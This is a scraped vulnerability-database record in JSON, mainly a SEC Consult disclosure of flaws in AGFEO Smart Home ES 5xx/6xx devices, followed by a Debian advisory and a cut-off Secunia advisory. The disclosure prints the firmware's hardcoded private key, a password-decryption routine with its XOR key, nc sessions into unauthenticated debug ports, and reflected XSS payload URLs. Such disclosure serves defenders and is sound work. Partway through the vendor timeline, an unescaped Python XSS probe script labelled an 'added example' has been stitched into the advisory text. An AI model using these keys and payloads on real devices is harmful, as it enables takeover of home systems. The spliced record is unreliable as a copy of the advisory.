Sd0WmX7MfsOxnEybLWQIKHD4\r\nsTclSDuTlQKBgQDZyRGk97oPazGT+Vf8LmgS5xysMJGLG3X7td7OQFiHtjO7btgv\r\nLj1Dqq+da/R4KJ1wtuImiBqPKZ/TH3myxVfbIe4LSHO2hGSSnpc65LfF7UjWtJkN\r\n2elCgc3lPspXYBxL71nKdsZPkXT/z1h0c6CMqXoCS6fT/2/gRuxOxx68KwKBgQCo\r\nSEM465wmSzU0v34GesZWKUj/nXycg1UyUoJK8ADNbcX3Q68A5sGMpc9sgPQSyTCm\r\nWxgyYC9wPviKdj2MqUpn9DAbRz0zbkDi5yyT1p+bW7sLY35Oj5Bb6Op4zY7wV7vs\r\nvVStyQHkMRCqUs7xI9hoepFSm/ySe2ZZQ6+pMi2dbQKBgQCn9FdGZzWOAIXrfj7Q\r\nSoMEUPEIEdxXYEy8Rudh9VVIJQW4tvYX6mQMr8fgx5RKRaTsL1Qv/tn9XGq00wes\r\n3NuLEq2urJAC7z8smqkvWm2xo91j+ExeRL66CfPdm5KPyaCXcuFysz5/LUKxG/a3\r\n+K62TQB1mEb1t9WQsxJYGcUiyg==\r\n-----END PRIVATE KEY-----\r\n\r\n\r\n4) Multiple reflected cross site scripting (XSS) vulnerabilities\r\nThe following crafted requests can be used to trigger the cross site scripting\r\nvulnerability at different entry 
points:\r\nhttp://<Device-IP>:20011/ais.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E\r\nhttp://<Device-IP>:20011/xtopbxwav.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E\r\nhttp://<Device-IP>:20011/update.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E\r\nhttp://<Device-IP>/pbxapi/licence.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E\r\nhttp://<Device-IP>/pbxapi/eoimport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E\r\nhttp://<Device-IP>/pbxapi/knximport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E\r\nhttp://<Device-IP>/pbxapi/hmimport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E\r\n\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nOne firmware is available for the whole ES 5 product line, and another one for\r\nthe product line ES 6. Therefore, all vulnerabilities which have been found in\r\none product of ES 5/6 are also available in all other products of ES 5/6.\r\n\r\nThe following product / firmware version has been tested by SEC Consult:\r\nES 512 Version 1.9b (es5xxv19b_c063be6)\r\nES 512 Version 1.10 (es5xxv110_f105485)\r\n\r\nBased on results of the SEC Technologies IoT Inspector\r\n(http://www.iot-inspector.com/ - automated firmware analysis tool) we believe\r\nthat the product line ES 6 is also prone to the identified vulnerabilities\r\n(except the web service on port 20011) as well as product line ES 5.\r\n\r\nFirmware Version 1.9b (ES6xxv19b_c063be67b9c2ba)\r\nFirmware Version 1.10 (ES6xxv110_f105485715a360)\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/28123"}], "packetstorm": [{"lastseen": "2017-07-12T17:44:57", "description": "", "published": "2017-07-12T00:00:00", "type": "packetstorm", "title": "AGFEO Smart Home ES 5xx / 6xx Authentication Bypass / XSS / Hardcoded Credentials", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-07-12T00:00:00", "id": "PACKETSTORM:143338", "href": 
"https://packetstormsecurity.com/files/143338/AGFEO-Smart-Home-ES-5xx-6xx-Authentication-Bypass-XSS-Hardcoded-Credentials.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20170712-0 > \n======================================================================= \ntitle: Multiple critical vulnerabilities \nproduct: AGFEO Smart Home ES 5xx \nAGFEO Smart Home ES 6xx \nvulnerable version: at least 1.9b, 1.10 \nfixed version: 1.12c \nCVE number: - \nimpact: Critical \nhomepage: https://www.agfeo.de/ \nfound: 2016-12-28 \nby: T. Weber (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nBangkok - Berlin - Linz - Luxembourg - Montreal - Moscow \nKuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \nAGFEO GmbH & Co. KG is a vendor of telephone systems and other \n(tele-)communication products like DECT phones, headsets or smart home \nproducts as well. \n \n \nBusiness recommendation: \n------------------------ \nThe available patches should be installed immediately. \n \nSEC Consult recommends not to use this product in a production environment \nuntil a thorough security review has been performed by security professionals \nas there are indications for further security issues. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Unauthenticated access to web services and authentication bypass \nA web service with multiple scripts for debug purposes is accessible \non an unusual port on the device. There is also a script to read files from \nthe filesystem. As the web service runs with root privileges all files \non the operating system can be read by an attacker. This only affects the \nES 5xx product line, all other vulnerabilities affect both ES 5xx and 6xx. 
\n \nThe configuration of the device can be changed and arbitrary updates can be \nuploaded as well as music files for the answering machine. By reading the \ndatabase content, the usernames and their passwords can be revealed and easily \ndecrypted. This way the administrator password can be dumped from the database \nand the device can be fully administrated by an attacker. \nThe normal user interface has an additional development subfolder which was \nprobably used during the development process. Updates can be triggered from \nthis sub platform and log files, statistics and states can also be displayed. \n \n \n2) Unauthenticated access to configuration ports \nMultiple different instances of TCP services are present on the device. Each \nof the listening sockets is forked from a debug and configuration service. \nInternal device information can be read from the device. Among other commands, \nthe configuration of the device can also be altered by using these services. \n \n \n3) Hardcoded cryptographic keys \nThree certificates including their private keys are embedded in the firmware \nof AGFEO ES 5xx/6xx SmartHome products. The certificates and keys in both \nproduct lines are exactly the same. One certificate is used for HTTPS \n(default server certificate for web based configuration and management). \n \nImpersonation, man-in-the-middle or passive decryption attacks are possible. \nThese attacks allow an attacker to gain access to sensitive information like \nadmin credentials and use them in further attacks. \n \n \n4) Multiple reflected cross site scripting (XSS) vulnerabilities \nThe ES 5xx SmartHome products are vulnerable to reflected cross site scripting. \nMalicious JavaScript code can be executed in the browser of a victim by luring \nto a handcrafted link. This is possible even if the victim is not logged in. \nIt is assumed that the 6xx products are affected as well but those could not be \ntested. 
\n \n \nProof of concept: \n----------------- \n1) Unauthenticated access to web services and authentication bypass \nThe debug web service is available by using the following url: \nhttp://<Device-IP>:20011/index.html \nThere are different scripts accessible, the following actions can be executed: \n-) Change IP configuration \n-) Change time zone \n-) Upload updates (Any files can be uploaded to the device!) \n-) Read all files on the filesystem \n-) Play, delete and move voice messages on all mail boxes \n-) Converting mp3 files to wav files \n-) List all connected phones and the related numbers \n \nThe SQLite database is located under \"/home/profile/poolstore.db\". By reading \nthis file the usernames and passwords can be dumped. The passwords are encoded \nwith base64 and encrypted with XOR. To decrypt the XOR'ed password the \nfollowing key has to be used: \n\"0x42 0xab 0xce 0xfa 0x54 0xed 0xcf 0xba\" \n \nThe function to decrypt the password was found in the php script \"login.php\": \nfunction decodePassword($PasswordEnc) \n{ \n$PasswordBinaryEncBase64 = \"\"; \n$PasswordBinaryEnc=\"\"; \n$PasswordBinary = array(); \n$Password = \"\"; \n$lastChar=0; \n \n$Key=array(0x42, 0xab, 0xce, 0xfa, 0x54, 0xed, 0xcf, 0xba); \n \n$PasswordBinaryEncBase64 = $PasswordEnc; \n \n// base64 decode \n$PasswordBinaryEnc = base64_decode($PasswordBinaryEncBase64); \n \n// xor decode \nfor($i=0; $i<strlen($PasswordBinaryEnc); $i++) { \n$PasswordBinary[$i] = ord($PasswordBinaryEnc[$i]) ^ $Key[$i % count($Key)] \n^ $lastChar; \n$lastChar = ord($PasswordBinaryEnc[$i]); \n} \n \n// erstes Zeichen entfernen (random char!) 
\nforeach ($PasswordBinary as $chr) { \n$Password .= chr($chr); \n} \n$Password = substr($Password, 1); \n// printf(\"%s:%d Password %s\\n\", __FUNCTION__, __LINE__, $Password); \nreturn $Password; \n} \n \nAn additional subfolder, which contains debug scripts, is available under the \nfollowing location: \nhttp://<Device-IP>/shdev/ui9.php \n \nUpdates can be triggered, logs can be shown and status messages can be gathered \nwithin this functionality. Furthermore, it is possible to debug the login \nprocess. Since there is a hardcoded user \"admin\" a brute force attack is also \npossible. \n \n \n2) Unauthenticated access to configuration ports \nThe following TCP ports can be accessed with \"nc <Device-IP> -p <Port>\": \n19002, 19004, 19006, 19009, 19010, 19080, 19081 \nBy connecting to one of these ports a debug interface spawns. For example the \nconnection to port 19081: \n$ nc 192.168.0.40 19081 \nStart Menue: <Return> \n========< UPDS - Menue >======== \ns: show state \nh: help \nD: DEBmod on \nd: DEBmod off \nL: LOG on \nl: LOG off \nS: SERVICE-SUBMENUE \nq: Quit telnet session \n========= NOT AKTIV =========== \ns \nstatus ausgeben (noch nicht vollstaendig implementiert) \nupds <Timestamp> bState: 00 \nupds <Timestamp> bLastReceiveBlockNum: 15 \n[...] \nS \nupds <Timestamp> \nupds <Timestamp> ===== service-menue ====================== \nupds <Timestamp> help help \nupds <Timestamp> q quit \nupds <Timestamp> D dial \nupds <Timestamp> d disconnect \nupds <Timestamp> ============ NOT AKTIV =================== \nservice submenue \n \n \n3) Hardcoded cryptographic keys \nRefer to our study on hardcoded cryptographic secrets in embedded systems for \nfurther information. \nhttp://blog.sec-consult.com/2016/09/house-of-keys-9-months-later-40-worse.html \nIoT Inspector (http://www.iot-inspector.com/) was used to identify this \nvulnerability. 
\n \nOpenSSL output for the certificate: \nCertificate: \nData: \nVersion: 1 (0x0) \nSerial Number: 10293758115057549292 (0x8edac6778bccbfec) \nSignature Algorithm: sha256WithRSAEncryption \nIssuer: C=DE, ST=Some-State, L=Bielefeld, O=AGFEO GmbH & Co. KG, OU=Dev, \nCN=info/emailAddress=info@agfeo.de \nValidity \nNot Before: Oct 21 14:03:55 2014 GMT \nNot After : Mar 8 14:03:55 2042 GMT \nSubject: C=DE, ST=Some-State, L=Bielefeld, O=AGFEO GmbH & Co. KG, OU=Dev, \nCN=info/emailAddress=info@agfeo.de \nSubject Public Key Info: \nPublic Key Algorithm: rsaEncryption \nPublic-Key: (2048 bit) \nModulus: \n00:be:79:ad:17:e8:c7:9e:63:b3:bb:67:ce:bd:79: \n29:66:22:ce:63:99:6a:a5:31:f4:70:5f:3f:9d:11: \n94:d6:65:8c:4e:43:6b:e4:d4:f1:f4:bd:81:4c:72: \n67:50:10:09:b8:60:b3:cd:be:23:ce:9a:75:ec:e4: \n7a:cf:3a:e2:f0:51:f9:a5:f3:c5:67:5d:01:e9:72: \n68:b1:59:f5:5b:d8:dc:3e:1d:00:df:06:a6:07:06: \n12:70:c7:97:05:a5:da:80:14:2c:c7:ae:6a:ef:a1: \n1a:b8:f8:6b:71:5e:91:04:da:43:ba:cf:7c:ef:bd: \n01:b7:15:a1:7b:8f:52:21:06:ad:48:b4:57:0c:b2: \nac:b2:14:fe:30:38:96:5e:28:b8:68:b2:d3:ee:8d: \n28:3c:ac:a0:95:c8:07:39:b7:df:95:6d:88:a2:12: \n77:31:a8:55:f6:ab:c7:17:16:03:5f:ca:f2:ca:8f: \nfd:37:65:2c:b0:aa:47:59:fe:d6:ec:69:8f:db:b6: \n9e:93:4b:f0:87:77:90:f6:5c:e4:64:d1:96:99:d5: \nd8:37:e4:7d:2f:bd:f4:04:fd:67:13:bc:68:ea:e6: \n00:dd:72:74:a2:fe:1a:00:27:8b:b8:96:a6:0c:93: \n82:52:6d:61:2c:62:02:b2:e8:ab:45:e4:87:98:d2: \nba:57 \nExponent: 65537 (0x10001) \nSignature Algorithm: sha256WithRSAEncryption \n37:12:cb:94:9a:51:f8:9a:04:9f:60:19:6a:12:23:38:10:85: \nb5:79:2b:49:5d:b6:65:82:76:c0:0b:20:d1:bf:04:ce:46:38: \n56:ea:0b:2e:41:f5:61:d1:12:d4:ce:34:d9:e3:2a:bb:e8:9f: \nf1:0e:0d:da:37:91:ee:92:dd:9a:85:91:14:a2:21:87:da:52: \n33:d6:ec:74:c0:3a:46:7f:82:02:91:75:99:ad:fd:72:1b:ec: \n00:64:10:e1:9c:81:3b:c9:8e:6b:73:d5:e1:df:7b:60:d4:b6: \n08:51:30:25:b1:a0:ed:f0:de:2e:15:33:c2:bf:c3:fe:69:1b: \na8:26:c3:25:f0:53:8e:1f:8a:aa:44:f4:59:88:5b:7d:27:d6: 
\na5:a9:e8:26:a9:ba:75:f0:84:5d:e0:e7:03:75:a0:a6:64:c4: \n16:ce:88:16:ca:72:f2:43:7a:08:b5:e3:48:d7:c3:a1:3a:28: \n43:3c:5a:30:d4:31:dc:68:a5:5c:da:7c:20:7b:ee:e6:a2:04: \na3:3e:f1:5d:39:f4:89:d7:f0:f3:b4:e6:5e:81:cd:60:34:61: \nef:e1:d8:59:f9:d0:5a:11:af:53:03:93:4a:9e:fb:1e:a3:8b: \n94:90:de:59:91:59:ff:f3:1b:5a:ef:7f:aa:33:c2:47:50:05: \n0a:bc:62:3c \n \nCertificate: \n-----BEGIN CERTIFICATE----- \nMIIDnDCCAoQCCQCO2sZ3i8y/7DANBgkqhkiG9w0BAQsFADCBjzELMAkGA1UEBhMC \nREUxEzARBgNVBAgMClNvbWUtU3RhdGUxEjAQBgNVBAcMCUJpZWxlZmVsZDEcMBoG \nA1UECgwTQUdGRU8gR21iSCAmIENvLiBLRzEMMAoGA1UECwwDRGV2MQ0wCwYDVQQD \nDARpbmZvMRwwGgYJKoZIhvcNAQkBFg1pbmZvQGFnZmVvLmRlMB4XDTE0MTAyMTE0 \nMDM1NVoXDTQyMDMwODE0MDM1NVowgY8xCzAJBgNVBAYTAkRFMRMwEQYDVQQIDApT \nb21lLVN0YXRlMRIwEAYDVQQHDAlCaWVsZWZlbGQxHDAaBgNVBAoME0FHRkVPIEdt \nYkggJiBDby4gS0cxDDAKBgNVBAsMA0RldjENMAsGA1UEAwwEaW5mbzEcMBoGCSqG \nSIb3DQEJARYNaW5mb0BhZ2Zlby5kZTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC \nAQoCggEBAL55rRfox55js7tnzr15KWYizmOZaqUx9HBfP50RlNZljE5Da+TU8fS9 \ngUxyZ1AQCbhgs82+I86adezkes864vBR+aXzxWddAelyaLFZ9VvY3D4dAN8GpgcG \nEnDHlwWl2oAULMeuau+hGrj4a3FekQTaQ7rPfO+9AbcVoXuPUiEGrUi0VwyyrLIU \n/jA4ll4ouGiy0+6NKDysoJXIBzm335VtiKISdzGoVfarxxcWA1/K8sqP/TdlLLCq \nR1n+1uxpj9u2npNL8Id3kPZc5GTRlpnV2DfkfS+99AT9ZxO8aOrmAN1ydKL+GgAn \ni7iWpgyTglJtYSxiArLoq0Xkh5jSulcCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEA \nNxLLlJpR+JoEn2AZahIjOBCFtXkrSV22ZYJ2wAsg0b8EzkY4VuoLLkH1YdES1M40 \n2eMqu+if8Q4N2jeR7pLdmoWRFKIhh9pSM9bsdMA6Rn+CApF1ma39chvsAGQQ4ZyB \nO8mOa3PV4d97YNS2CFEwJbGg7fDeLhUzwr/D/mkbqCbDJfBTjh+KqkT0WYhbfSfW \npanoJqm6dfCEXeDnA3WgpmTEFs6IFspy8kN6CLXjSNfDoTooQzxaMNQx3GilXNp8 \nIHvu5qIEoz7xXTn0idfw87TmXoHNYDRh7+HYWfnQWhGvUwOTSp77HqOLlJDeWZFZ \n//MbWu9/qjPCR1AFCrxiPA== \n-----END CERTIFICATE----- \n \nPrivate Key: \n-----BEGIN PRIVATE KEY----- \nMIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQC+ea0X6MeeY7O7 \nZ869eSlmIs5jmWqlMfRwXz+dEZTWZYxOQ2vk1PH0vYFMcmdQEAm4YLPNviPOmnXs \n5HrPOuLwUfml88VnXQHpcmixWfVb2Nw+HQDfBqYHBhJwx5cFpdqAFCzHrmrvoRq4 
\n+GtxXpEE2kO6z3zvvQG3FaF7j1IhBq1ItFcMsqyyFP4wOJZeKLhostPujSg8rKCV \nyAc5t9+VbYiiEncxqFX2q8cXFgNfyvLKj/03ZSywqkdZ/tbsaY/btp6TS/CHd5D2 \nXORk0ZaZ1dg35H0vvfQE/WcTvGjq5gDdcnSi/hoAJ4u4lqYMk4JSbWEsYgKy6KtF \n5IeY0rpXAgMBAAECggEAI7joKJrEjUT/mT8Pu+M0S25trKpCIPcsc8K5SHjapBbp \naGgmnQT+17qOvEqca5yGZijkr8pgJsg7I5F6ItFVbGLDYkdEl20PBbwqPFC1vmL+ \nczu3RRyXGKwf2zzjavC++NRPzac9cPGS9GvKorlsky9oEmoFcWTOJIsO/QBVE9I8 \nhPc5utxQQ5WTDfUD84Y2ELJx/qhZNB8gOF+KhDQT0slE1/7Y7sHMi++kxVj+KiVb \nKif3DxpB6reMP5s1zhmfJcF9pPrr6jT35OuEjQ15y9p9wrLL1txfJbi3O6Ucwd3q \nINHugNN/v+/6ia06aZtknxYoG+hFS7PbulU11VSimQKBgQDzoQRtO0MjEo3Gucqi \niaxpueYsAizJx9GkdCh7StN8ZWADpZj6x7B6vIhjXZO6Q5bM6j838lYWyNYsBHpq \nFXeAM8cPIm7xUpRQDLKfhU9YA9/6iQ8/dzTYR49uj67syc9HH9dIOsRyVAy2ci6S \nUySE3aTSCJCwSerpFZWoPqsbOwKBgQDIJbQQg+QnAOdTYdmIQv8zW6nLvuwLzNkP \nwxFlZ/78DI8+2h1H5LGd/2C2ybKIsif/pU5u721qkqxIrIc1I3BWcX+O+QwiJ1oO \nSBeA3gzcD7IOpW2GqyN8tt8cWo48moDjIcSYGB6mSd0WmX7MfsOxnEybLWQIKHD4 \nsTclSDuTlQKBgQDZyRGk97oPazGT+Vf8LmgS5xysMJGLG3X7td7OQFiHtjO7btgv \nLj1Dqq+da/R4KJ1wtuImiBqPKZ/TH3myxVfbIe4LSHO2hGSSnpc65LfF7UjWtJkN \n2elCgc3lPspXYBxL71nKdsZPkXT/z1h0c6CMqXoCS6fT/2/gRuxOxx68KwKBgQCo \nSEM465wmSzU0v34GesZWKUj/nXycg1UyUoJK8ADNbcX3Q68A5sGMpc9sgPQSyTCm \nWxgyYC9wPviKdj2MqUpn9DAbRz0zbkDi5yyT1p+bW7sLY35Oj5Bb6Op4zY7wV7vs \nvVStyQHkMRCqUs7xI9hoepFSm/ySe2ZZQ6+pMi2dbQKBgQCn9FdGZzWOAIXrfj7Q \nSoMEUPEIEdxXYEy8Rudh9VVIJQW4tvYX6mQMr8fgx5RKRaTsL1Qv/tn9XGq00wes \n3NuLEq2urJAC7z8smqkvWm2xo91j+ExeRL66CfPdm5KPyaCXcuFysz5/LUKxG/a3 \n+K62TQB1mEb1t9WQsxJYGcUiyg== \n-----END PRIVATE KEY----- \n \n \n4) Multiple reflected cross site scripting (XSS) vulnerabilities \nThe following crafted requests can be used to trigger the cross site scripting \nvulnerability at different entry points: \nhttp://<Device-IP>:20011/ais.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E \nhttp://<Device-IP>:20011/xtopbxwav.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E \nhttp://<Device-IP>:20011/update.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E 
\nhttp://<Device-IP>/pbxapi/licence.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E \nhttp://<Device-IP>/pbxapi/eoimport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E \nhttp://<Device-IP>/pbxapi/knximport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E \nhttp://<Device-IP>/pbxapi/hmimport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E \n \n \nVulnerable / tested versions: \n----------------------------- \nOne firmware is available for the whole ES 5 product line, and another one for \nthe product line ES 6. Therefore, all vulnerabilities which have been found in \none product of ES 5/6 are also present in all other products of ES 5/6. \n \nThe following product / firmware versions have been tested by SEC Consult: \nES 512 Version 1.9b (es5xxv19b_c063be6) \nES 512 Version 1.10 (es5xxv110_f105485) \n \nBased on results of the SEC Technologies IoT Inspector \n(http://www.iot-inspector.com/ - automated firmware analysis tool) we believe \nthat the ES 6 product line is prone to the same vulnerabilities as the ES 5 \nproduct line, except for the web service on port 20011. \n \nFirmware Version 1.9b (ES6xxv19b_c063be67b9c2ba) \nFirmware Version 1.10 (ES6xxv110_f105485715a360) \n \n \nVendor contact timeline: \n------------------------ \n2017-01-10: Contacted vendor through info@agfeo.de and set release date \nto 2017-03-01 according to SEC Consult responsible disclosure \npolicy. \n2017-01-12: Contact asks to receive the security advisory unencrypted. \nSending security advisory unencrypted. \n2017-01-17: Call with vendor. Vendor is working on a fix of the found \nvulnerabilities. \n2017-02-06: Asking for status update via mail; Contact responds that \nmost of the vulnerabilities are fixed and a new version will \nbe available soon. \n2017-02-22: Asking for status update via mail. Contact responds that \na new firmware is available soon. \n2017-02-24: New firmware version is 1.12 for ES 5/6 series. \n2017-02-28: The firmware will be available in CW11. 
Shifting release of \nadvisory to 2017-03-15. \n2017-03-13: Asked for a status update. \n2017-03-14: Vendor responds that the update will be available on \n2017-03-21. Shifted release to 2017-03-21. \n2017-03-20: Asked vendor when the updated firmware is available for \ndownload; Vendor responds that the updated firmware which \ncontains fixes for all vulnerabilities can be received after \ncontacting their Hotline. They also stated that the update \nwill be available on the homepage in the next few days. \nInformed the vendor that the advisory will be published \nwhen the update is available on the homepage in the next \nfew days. Shifted release to CW14. \n2017-04-05: Asked for status update. Vendor responds that firmware will \nbe available next week. Shifted release to unknown. \n2017-04-24: Asked whether the download is available or not. Firmware \nwill be available next week. \n2017-04-25: Found new version 1.12a for ES 6xx on vendor home page. \n2017-05-26: Found new version 1.11a for ES 5xx on vendor home page. \n2017-05-29: Asked whether the current firmware contains all the fixes. \nVendor responds that only a part of the vulnerabilities \nis fixed. They also state that v1.12b, for all products \nexcept \"ES5xx up\", will be available this week. This \nfirmware contains all fixes. \n2017-06-06: Asked vendor for the current state, because the contact said \nthat all vulnerabilities are fixed and the firmware can be \nreceived after calling the hotline. Asked vendor which \nvulnerabilities are actually fixed; No answer. \n2017-06-14: Informed vendor that the advisory will be published on \n2017-07-12 because of the long \"ping-pong\" game without \na real outcome. \n2017-06-22: Contact stated that version 1.12c will be available next \nweek. \n2017-07-03: Found new version 1.12c for ES 5/6/7 on vendor home page \n(available since 2017-06-30). \n2017-07-12: Coordinated release of security advisory. 
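As an added example for the reflected XSS entry points in section 4 above (this is not SEC Consult's or AGFEO's code), the following Python probe requests each entry point with a benign marker payload in the same PATH_INFO position the advisory uses and classifies whether the response echoes it raw, HTML-encoded, or not at all. The marker, the host and the two sample responses are constructed for this example; the advisory does not say which server variable the device reflects, so the check is purely black-box.

```python
import html
import urllib.error
import urllib.request
from urllib.parse import quote

# Entry points from section 4 of the advisory. The path segment after the
# script name is reflected into the page; on ES 6 the port-20011 service is
# absent, so only the /pbxapi/ scripts apply there.
PORT_20011_SCRIPTS = ("ais.php", "xtopbxwav.php", "update.php")
PBXAPI_SCRIPTS = ("licence.php", "eoimport.php", "knximport.php", "hmimport.php")

# Marker constructed for this example: harmless if it executes, unambiguous
# when searched for. The '">' prefix breaks out of a quoted attribute, which is
# what the advisory's '"><script>' payload relies on.
MARKER = "xssprobe7f3a"
PAYLOAD = '"><script>' + MARKER + "</script>"


def probe_urls(host: str):
    """The advisory's seven entry points with the marker payload appended as PATH_INFO."""
    enc = quote(PAYLOAD, safe="")            # percent-encode everything, including '/'
    for script in PORT_20011_SCRIPTS:
        yield "http://%s:20011/%s/%s" % (host, script, enc)
    for script in PBXAPI_SCRIPTS:
        yield "http://%s/pbxapi/%s/%s" % (host, script, enc)


def reflected_unescaped(body: str) -> bool:
    """True when the payload comes back byte-for-byte, i.e. the '<script>' tag
    survived into the HTML. A correct reflection only ever contains &lt;script&gt;."""
    return PAYLOAD in body


def classify(body: str) -> str:
    """vulnerable / reflected-encoded / not-reflected for one response body."""
    if reflected_unescaped(body):
        return "vulnerable"
    if MARKER in body:                       # echoed, but the tag characters were encoded
        return "reflected-encoded"
    return "not-reflected"


def probe(host: str, timeout: float = 5.0) -> dict:
    """Request every entry point and classify the response. Needs network access
    to the device; error responses (4xx/5xx) are still inspected, since the
    reflection often lives in an error page."""
    results = {}
    for url in probe_urls(host):
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", errors="replace")
        except urllib.error.HTTPError as err:
            body = err.read().decode("utf-8", errors="replace")
        except (urllib.error.URLError, OSError) as err:
            results[url] = "error: %s" % err
            continue
        results[url] = classify(body)
    return results


# Constructed sample responses (not captured from a device): what a page that
# writes the request path into a form action looks like raw vs. HTML-encoded.
VULNERABLE_RESPONSE = '<form action="/ais.php/%s" method="post">' % PAYLOAD
SAFE_RESPONSE = '<form action="/ais.php/%s" method="post">' % html.escape(PAYLOAD, quote=True)


if __name__ == "__main__":
    import sys
    # usage: python probe_agfeo_xss.py <Device-IP>; without arguments, run on the samples
    if len(sys.argv) > 1:
        for url, verdict in probe(sys.argv[1]).items():
            print(verdict.ljust(18), url)
    else:
        print("sample raw reflection    :", classify(VULNERABLE_RESPONSE))
        print("sample encoded reflection:", classify(SAFE_RESPONSE))
```

The "vulnerable" verdict is the one to re-test after installing firmware 1.12c, since the timeline above shows the vendor shipping partial fixes first. Server-side, the general fix for this class of bug in PHP is to pass whatever part of the request path is written back into the page through htmlspecialchars() with ENT_QUOTES instead of echoing it raw; which variable the device echoes is not stated in the advisory.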
\n \n \nSolution: \n--------- \nCall AGFEO hotline (+49 521 44709-0) or log in to the vendor home page \nto get the newest firmware version. \n \n \nWorkaround: \n----------- \nNone \n \n \nAdvisory URL: \n------------- \nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult \nBangkok - Berlin - Linz - Luxembourg - Montreal - Moscow \nKuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It \nensures the continued knowledge gain of SEC Consult in the field of network \nand application security to stay ahead of the attacker. The SEC Consult \nVulnerability Lab supports high-quality penetration testing and the evaluation \nof new offensive and defensive technologies for our customers. Hence our \ncustomers obtain the most current information about vulnerabilities and valid \nrecommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://www.sec-consult.com/en/Career.htm \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://www.sec-consult.com/en/About/Contact.htm \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF T. 
Weber / @2017 \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/143338/SA-20170712-0.txt"}], "debian": [{"lastseen": "2019-05-30T02:21:58", "bulletinFamily": "unix", "cvelist": ["CVE-2017-10807"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3902-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJuly 05, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : jabberd2\nCVE ID : CVE-2017-10807\nDebian Bug : 867032\n\nIt was discovered that jabberd2, a Jabber instant messenger server,\nallowed anonymous SASL connections, even if disabled in the\nconfiguration.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 2.4.0-3+deb9u1.\n\nWe recommend that you upgrade your jabberd2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "modified": "2017-07-05T19:49:40", "published": "2017-07-05T19:49:40", "id": "DEBIAN:DSA-3902-1:19004", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00163.html", "title": "[SECURITY] [DSA 3902-1] jabberd2 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow 
Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An 